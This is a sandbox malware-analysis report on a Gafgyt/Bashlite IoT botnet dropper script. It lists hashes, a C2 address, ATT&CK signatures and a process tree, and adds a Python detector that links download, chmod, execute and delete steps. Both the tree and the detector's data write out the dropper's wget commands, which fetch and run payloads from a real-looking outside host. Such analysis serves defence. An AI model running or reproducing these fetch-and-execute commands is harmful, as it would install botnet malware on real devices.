Analysis

  • max time kernel
    37s
  • max time network
    41s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags
    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    28-09-2024 07:55

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    884dc57dd0892038d53a2d4b017504df

  • SHA1

    52ab9780591ee9718ce6188a9edafc1afa05dcdf

  • SHA256

    d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

  • SHA512

    25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Malware Config

Extracted

Family

gafgyt

C2

205.185.127.244:23

Signatures

  • Detected Gafgyt variant 4 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:644
      • /usr/bin/wget
        wget http://205.185.127.244/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:651
      • /bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:751
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:752
      • /bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:758
      • /usr/bin/wget
        wget http://205.185.127.244/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:759
      • /bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:762
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:763
      • /bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:765
      • /usr/bin/wget
        wget http://205.185.127.244/sh4
        2⤵
        • Writes file to tmp directory
        PID:766
      • /bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:767
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:768
      • /bin/rm
        rm -rf sh4
        2⤵
        PID:770
      • /usr/bin/wget
        wget http://205.185.127.244/x86
        2⤵
        • Writes file to tmp directory
        PID:771
      • /bin/chmod
        chmod +x x86
        2⤵
        • File and Directory Permissions Modification
        PID:772
      • /tmp/x86
        ./x86
        2⤵
        • Executes dropped EXE
        PID:773
      • /bin/rm
        rm -rf x86
        2⤵
        PID:775
      • /usr/bin/wget
        wget http://205.185.127.244/arm61
        2⤵
        PID:776
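The process tree above is the entire dropper loop: for each CPU architecture the script fetches a payload from 205.185.127.244 with wget, marks it executable, runs it, deletes it and moves on to the next name (the run ends on the arm61 fetch). The sandbox is debian-9_armhf, so none of the mips, mipsel, sh4 or x86 binaries can run natively there; the loop continues regardless, which is why a detector should key on the download/chmod/execute/delete sequence rather than on a successful execution. The Python below is an added example for this report, not part of the sample or of the sandbox's own output: it links the child processes of one parent into per-payload chains and extracts the network IoCs. PROCESS_EVENTS is constructed from the tree above (the parent of PID 644 is not shown in the report, so it is recorded as None), and the DOWNLOADERS set is an assumption about which fetch tools to treat as the download stage.

```python
"""Link a shell dropper's child processes into download -> chmod -> execute
-> delete chains and pull out the IoCs.  Added example for this report."""
import os
from collections import defaultdict
from urllib.parse import urlparse

# Constructed from the Processes section above: (pid, ppid, exe, cmdline).
# The parent of PID 644 is not shown in the report, so it is None here.
PROCESS_EVENTS = [
    (644, None, "/tmp/sex.sh",   "/tmp/sex.sh"),
    (651, 644,  "/usr/bin/wget", "wget http://205.185.127.244/mips"),
    (751, 644,  "/bin/chmod",    "chmod +x mips"),
    (752, 644,  "/tmp/mips",     "./mips"),
    (758, 644,  "/bin/rm",       "rm -rf mips"),
    (759, 644,  "/usr/bin/wget", "wget http://205.185.127.244/mipsel"),
    (762, 644,  "/bin/chmod",    "chmod +x mipsel"),
    (763, 644,  "/tmp/mipsel",   "./mipsel"),
    (765, 644,  "/bin/rm",       "rm -rf mipsel"),
    (766, 644,  "/usr/bin/wget", "wget http://205.185.127.244/sh4"),
    (767, 644,  "/bin/chmod",    "chmod +x sh4"),
    (768, 644,  "/tmp/sh4",      "./sh4"),
    (770, 644,  "/bin/rm",       "rm -rf sh4"),
    (771, 644,  "/usr/bin/wget", "wget http://205.185.127.244/x86"),
    (772, 644,  "/bin/chmod",    "chmod +x x86"),
    (773, 644,  "/tmp/x86",      "./x86"),
    (775, 644,  "/bin/rm",       "rm -rf x86"),
    (776, 644,  "/usr/bin/wget", "wget http://205.185.127.244/arm61"),
]

# Assumption: the fetch tools IoT droppers commonly use for the download stage.
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}


def _name(path):
    """Basename of a path or URL path: './mips', '/tmp/mips' and 'mips' all -> 'mips'."""
    return os.path.basename(path)


def _advance(chain, stage, pid):
    chain["stages"].append(stage)
    chain["pids"].append(pid)


def find_dropper_chains(events):
    """Group child processes by parent and link them into per-payload chains.

    A chain opens at a download whose URL basename is N; later chmod, execution
    and rm of a path with basename N under the same parent are attached to it.
    Returns {ppid: [chain, ...]} with chains ordered by their first PID.
    """
    by_parent = defaultdict(list)
    for pid, ppid, exe, cmd in events:
        if ppid is not None:
            by_parent[ppid].append((pid, exe, cmd))

    results = {}
    for ppid, procs in by_parent.items():
        procs.sort()                  # PIDs grow monotonically within one run
        chains, pending = [], {}      # pending: payload name -> chain being built
        for pid, exe, cmd in procs:
            argv = cmd.split()
            if not argv:
                continue
            tool = _name(argv[0])
            if tool in DOWNLOADERS:
                url = next((a for a in argv[1:] if "://" in a), None)
                if url is None:
                    continue
                parsed = urlparse(url)
                name = _name(parsed.path)
                pending[name] = {"name": name, "url": url, "host": parsed.hostname,
                                 "stages": ["download"], "pids": [pid]}
            elif tool == "chmod":
                for target in argv[1:]:           # '+x' is not a pending name, skipped
                    if _name(target) in pending:
                        _advance(pending[_name(target)], "chmod", pid)
            elif tool == "rm":
                for target in argv[1:]:           # '-rf' is skipped the same way
                    chain = pending.pop(_name(target), None)
                    if chain is not None:
                        _advance(chain, "delete", pid)
                        chains.append(chain)
            elif _name(exe) in pending:
                _advance(pending[_name(exe)], "execute", pid)   # the payload itself ran
        chains.extend(pending.values())   # downloads never cleaned up, or cut off
        chains.sort(key=lambda c: c["pids"][0])
        for chain in chains:
            chain["complete"] = {"download", "chmod", "execute"} <= set(chain["stages"])
        results[ppid] = chains
    return results


def summarize(events):
    """Triage summary: hosts to block, URLs seen, and a multi-arch dropper verdict.

    The verdict fires when one run completes two or more download/chmod/execute
    chains against a single host, i.e. it is cycling payloads by architecture.
    """
    chains = sorted((c for cs in find_dropper_chains(events).values() for c in cs),
                    key=lambda c: c["pids"][0])
    complete = [c for c in chains if c["complete"]]
    return {
        "hosts": sorted({c["host"] for c in chains}),
        "urls": [c["url"] for c in chains],
        "payloads": [c["name"] for c in chains],
        "complete_chains": len(complete),
        "incomplete": [c["name"] for c in chains if not c["complete"]],
        "multiarch_dropper": len(complete) >= 2 and len({c["host"] for c in complete}) == 1,
    }


if __name__ == "__main__":
    for key, value in summarize(PROCESS_EVENTS).items():
        print(f"{key}: {value}")
```

On a live host the same function can be fed execve records from auditd or an eBPF tracer, as long as each record carries pid, ppid, the executable path and the command line; the chain logic is keyed on the payload basename, so it does not care whether the dropper uses `./mips` or the full `/tmp/mips` path to run the payload.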

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/mips

    Filesize

    176KB

    MD5

    24e07a16008a42f0a8dceb166b4b44cd

    SHA1

    87f80fc2998304bc8735479faa75f509a6d5db13

    SHA256

    c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f

    SHA512

    b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

  • /tmp/mipsel

    Filesize

    176KB

    MD5

    ac28a3dfa3ed9b815a8021a362b06607

    SHA1

    93455b3775f586e230d8879489f9a6062de70677

    SHA256

    3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5

    SHA512

    94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

  • /tmp/sh4

    Filesize

    123KB

    MD5

    5ec3c0e18b6fbc6e37bd611e2df8f9a4

    SHA1

    de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d

    SHA256

    9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6

    SHA512

    76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

  • /tmp/x86

    Filesize

    127KB

    MD5

    678363120cd2661f040670b90f211243

    SHA1

    57d75e1c42243d08eb78623e6cdc6b066994a7ee

    SHA256

    cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a

    SHA512

    5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55